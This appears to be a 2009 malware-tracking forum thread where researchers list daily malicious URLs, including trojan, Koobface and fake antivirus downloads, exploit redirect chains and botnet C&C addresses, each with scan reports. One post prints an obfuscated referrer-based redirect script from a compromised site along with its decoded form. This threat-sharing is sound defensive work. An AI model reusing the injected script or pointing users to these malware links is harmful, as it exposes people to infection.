daily something......

[CkreM]

Koobface:

Code: [Select]

71.8.59.249/setup.exeTrojan:

Code: [Select]

vexpen.jino.ru/file/bot.exehttp://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a

Fake AV:

Code: [Select]

antvirushelpv1.com(download link aint working atm but will work soon i guess..)

Code: [Select]

securityhelpcenter.com/1/  (currently only have a link to the fake payment site at:

Code: [Select]

live-payment-system.com/buy.php?nh=1&id=

[MysteryFCM]

http://antvirushelpv1.com/download.php?id=2004



Downloads: Install_2004.exe (132K)

Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;

qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm

You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));
Which decodes to;

Code: [Select]

function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}

window.onFocus = f()
/edit

http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2

[CkreM]

i actually can download it directly(

Code: [Select]

http://antvirushelpv1.com/download.php?id=2004)

[MysteryFCM]

You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain

[CkreM]

You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain

 

[CkreM]

Redirects to exploits:

Code: [Select]

popyodiw.cn/s/in.cgi?10Koobface:

Code: [Select]

123.199.89.28/setup.exeTrojan:

Code: [Select]

ji-u.cn/506.exehttp://www.virustotal.com/analisis/9c37779c08a666084c8088a42b44bbf6
Trojan:

Code: [Select]

claremontfinance.org/voland.exehttp://www.virustotal.com/analisis/970e0653980bb5313e6f9bbf82b32cc7
Trojan:

Code: [Select]

photo-host.in/new/exe/5555.exehttp://www.virustotal.com/analisis/bc8cb44f6b8046208e130186e4b78098
Trojan:

Code: [Select]

091809.ru/main_.exehttp://www.virustotal.com/analisis/d82a419082bfcf5c716bb6388f3c9ad1
Trojan:

Code: [Select]

buzizoo2.com/15.05-fuck.exehttp://www.virustotal.com/analisis/b42234e7210ce0192855eb43c3121b49
Trojan:

Code: [Select]

213.171.222.30/codec.exehttp://www.virustotal.com/analisis/14e090fe72f0114a4181d7d0d1b5b8fd

[SysAdMini]

exploits

Code: [Select]

numbersbulk.cn/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=ac1e4c06e172e7e6d75c8ac4c7ebb81d&t=1242647454&type=js

trojan

Code: [Select]

numbersbulk.cn/load.php?id=5http://www.virustotal.com/analisis/1b81c4c3f26c3b88d3721b61b0fe8f14 7/40

[CkreM]

Exploit/trojan:

Code: [Select]

pimpalas.cn/yespdf/index.phphttp://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js

Redirect to fake AV:

Code: [Select]

gogenscan.com
gozonescan.comFake AV:

Code: [Select]

fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info

[SysAdMini]

Code: [Select]

pearch.net/in.cgi?7
redirects to

Code: [Select]

europpc.com/search.php?iw=1&links=
links redirect to

Code: [Select]

wplstr.net/in.cgi?20
redirects to fake system check

Code: [Select]

systemstabilityscan.com/5
starts download

Code: [Select]

http://adioro.com/download.php?aid=5
redirects to

Code: [Select]

dl1.adioro.com/get.php?track_id=5
downloads

Code: [Select]

dl1.adioro.com/distribs/5/registryoptimizer.exehttp://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a

[Malware-Web-Threats]

72.47.253.37

redirects to exploits:

Code: [Select]

hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet
Wepawet
Wepawet
The latest has no report (too many submissions for wepawet since hours)

[Malware-Web-Threats]

redirects to exploits
91.212.41.119

Code: [Select]

hxxp://silzefos.cn/s/in.cgi?13
Wepawet
Registrant: Meng Qun / janglkd@ yeah.net

exploits / trojan
221.5.74.52

Code: [Select]

hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com

Wepawet (exploit)

VirusTotal (flash) - 3/39 (7.69%)
Wepawet (flash)

VirusTotal (pdf) - 7/39 (17.95%)
VirusTotal (exe) - 3/39 (7.69%)

Anubis
ThreatExpert

Botnet C&C:
213.182.197.249

Code: [Select]

hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis
Registrant: Chen / chen.poon1732646@ yahoo.com

Botnet C&C:
78.129.166.5

Code: [Select]

hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis
Registrant: SmithJohn / Chehhost@ admin.ru

[Malware-Web-Threats]

91.209.163.201 - vl01.c76.fvtn.net

Code: [Select]

hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php

91.209.163.202 - vl02.c76.fvtn.net

Code: [Select]

hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php

91.209.163.203 - vl03.c76.fvtn.net

Code: [Select]

hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php

same file:

File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95

VirusTotal - 12/40 (30%)

Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net

related to: http://www.siteadvisor.com/sites/live-player.com

[SysAdMini]

Code: [Select]

filesstoragesarchive.com/softwarefortubeview.42002.exehttp://www.virustotal.com/analisis/e28f31c90582938ebfb7674f6136ad80 3/40
http://www.threatexpert.com/report.aspx?md5=f15dd0112f6f77dbce18d349dd65af79

[CkreM]

Emold:

Code: [Select]

ku98.biz/ghost/dia.exehttp://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:

Code: [Select]

rezident77.ru/files/cry.exehttp://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:

Code: [Select]

121.13.55.49/setup.exe
79.181.99.78/setup.exe

[CkreM]

Trojan:

Code: [Select]

samog0n.info/analyse/3xNt0f6b9e3R.exehttp://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:

Code: [Select]

tamporn.net/indir.exe http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan

Code: [Select]

yourelitehosting.ru/explorer.exehttp://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9

Redirects to rogue:

Code: [Select]

spyware-systems.info/0/go.php?sid=2 Exploit/trojan:

Code: [Select]

dr-w-corporation.ru/404/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js